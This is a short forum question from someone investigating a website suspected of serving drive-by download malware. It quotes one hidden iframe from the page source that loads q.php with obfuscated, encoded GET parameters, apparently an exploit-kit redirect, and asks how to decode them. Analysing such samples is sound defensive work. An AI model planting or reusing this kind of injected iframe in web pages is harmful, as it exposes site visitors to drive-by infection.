I Have been asked to analyze a website with suspicious activity such as drive-by download malware.

The source code of page is this:

<iframe src="/ca172171ce451f92c398830a954d402b/q.php?vywnynlp= 30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f"></iframe>

I can't understand the value of attribute that be sended to q.php through get method


i think unknown code that consider as value is some obfuscating javascript code.

anyone can underdstand it or guide me?

thanks a lot